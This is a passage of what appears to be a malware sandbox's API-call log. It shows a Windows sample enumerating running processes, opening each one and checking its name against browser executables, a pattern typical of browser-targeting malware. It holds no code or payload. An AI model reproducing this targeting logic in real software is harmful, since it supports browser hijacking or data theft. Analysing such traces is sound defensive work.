	[0202.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0202.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x22e8
	[0202.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.596] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0202.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.597] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.597] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0202.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.597] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0202.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x22ec
	[0202.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.598] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0202.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.599] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.599] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0202.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.599] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0202.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x22f0
	[0202.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.600] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0202.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.601] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.601] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0202.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.601] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.601] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0202.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x22f4
	[0202.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.602] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0202.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.603] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.603] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0202.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.603] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.603] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0202.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x22f8
	[0202.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.604] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0202.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.604] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.605] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0202.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.605] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.605] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0202.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x22fc
	[0202.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.606] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.606] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.606] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.607] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.607] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2300
	[0202.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.608] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.608] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.608] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.609] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.609] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2304
	[0202.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.610] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.610] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.610] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.610] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.611] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2308
	[0202.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.611] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.612] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.612] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.612] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.613] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x230c
	[0202.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.621] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.621] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.622] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.622] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.622] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2310
	[0202.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.623] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.623] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.624] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.624] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.624] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2314
	[0202.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.625] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.625] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.625] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.626] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.626] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2318
	[0202.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.627] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.627] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.627] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.628] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.628] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0202.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x231c
	[0202.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.629] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0202.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.632] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.632] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0202.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.632] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.633] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2320
	[0202.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.634] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.634] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.634] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.635] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0202.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2324
	[0202.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.636] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.636] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.636] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.637] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0202.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2328
	[0202.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.638] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0202.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.638] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.638] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0202.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.638] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.639] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0202.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x232c
	[0202.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.639] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0202.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.640] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.640] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0202.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.640] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0202.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2330
	[0202.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.641] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0202.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.642] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.642] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0202.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.642] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0202.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2334
	[0202.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.644] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0202.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.644] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.644] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0202.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.645] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.645] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0202.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2338
	[0202.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.646] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0202.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.646] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.646] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0202.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.646] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.646] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0202.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x233c
	[0202.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.647] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0202.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.648] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.648] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0202.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.648] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.648] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0202.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0202.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0202.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2340
	[0202.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.650] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0202.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.651] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.651] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0202.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.652] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.652] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0202.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2344
	[0202.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.653] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0202.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.653] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0202.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.653] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0202.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.654] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0202.654] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0202.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2348
	[0202.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0202.655] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0202.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
